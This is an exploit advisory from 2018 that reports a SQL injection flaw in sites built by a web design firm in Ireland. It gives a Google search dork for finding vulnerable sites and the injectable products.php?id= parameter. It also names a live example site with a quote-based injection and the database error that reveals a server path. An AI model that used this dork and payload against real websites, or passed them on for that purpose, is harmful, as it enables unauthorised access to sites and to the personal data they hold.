################################################################################################# # Exploit Title : Website Designed By 21st Century Ireland SQL Injection Vulnerability # Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army # Date : 12/09/2018 # Vendor Homepage : 21stcentury.ie # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # CWE : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ] ################################################################################################# # Description : SportLoMo, Next Generation Sports Software (formerly 21s Century Computers) League and Membership software for Sports Associations, Leagues and Clubs. This Software takes the hassle out of running amateur sport. The company operates as Sports Manager in Ireland. SportLoMo, is used by sports administrators to manage league competitions & player data for one million people. Head office in Mayo, Ireland. # Google Dork : intext:''website designed by 21st Century'' site:ie intext:''website designed by: 21st Century Web Design'' site:ie # Exploit : /products.php?id=[SQL Injection] ################################################################################################# # Example Site => mchalefm.ie/products.php?id=2%27 => [ Proof of Concept ] => archive.is/9nmGB # SQL Database Error => Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in E:\Domains\m\mchalefm.ie-1082275747\user\htdocs\class\db.sqlfunctions.class.php on line 57 ################################################################################################# # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team #################################################################################################